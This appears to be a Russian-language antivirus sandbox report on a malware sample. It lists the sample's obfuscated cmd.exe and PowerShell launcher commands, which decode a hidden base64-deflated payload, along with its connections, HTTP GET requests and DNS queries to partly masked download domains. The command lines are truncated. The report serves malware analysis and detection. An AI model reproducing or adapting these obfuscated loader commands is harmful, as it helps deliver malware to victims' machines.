Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' cMd.eXE/C "SEt cfS= (nEW-ObjeCt SYsTEM.iO.COmPRESSioN.DEfLATestREAm([IO.mEMorYstrEam] [SysTem.convErt]::FrOmBASe64sTRINg('NZBRa8IwFIX/Sh4CUZzpy0BmKFg23cpkPoiK4kua3s60aW5p03ZS/O+zhb6e8/Ed7qVf3...
Сетевая активность
Подключается к
- 'am##ist.com':80
- 'hu###omains.com':443
- 'co####iaagro.com.co':80
- 'sa##udio.co':80
- 'sa##udio.co':443
- 'ma###nirou.com':80
TCP
Запросы HTTP GET
- http://am##ist.com/AEZf
- http://co####iaagro.com.co/EZLOpSOF
- http://www.sa##udio.co/AU4fI
- http://ma###nirou.com/oG
Другие
- 'hu###omains.com':443
- 'sa##udio.co':443
UDP
- DNS ASK am##ist.com
- DNS ASK hu###omains.com
- DNS ASK al##.#plms.com.au
- DNS ASK co####iaagro.com.co
- DNS ASK sa##udio.co
- DNS ASK ma###nirou.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' cMd.eXE/C "SEt cfS= (nEW-ObjeCt SYsTEM.iO.COmPRESSioN.DEfLATestREAm([IO.mEMorYstrEam] [SysTem.convErt]::FrOmBASe64sTRINg('NZBRa8IwFIX/Sh4CUZzpy0BmKFg23cpkPoiK4kua3s60aW5p03ZS/O+zhb6e8/Ed7qVf3...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $2le87h =[TYPe](\"{1}{3}{0}{2}\"-f'E','ENviR','NT','oNm' ) ; ${e`x`eCuTIoNC`ONtEXT}.\"in`VoKeC`O`MMAND\".(\"{0}{2}{3}{1}\" -f'i','Cript','nVo','kEs' ).Invoke( ( ( Get-VariaBLE (\"2L\"+...
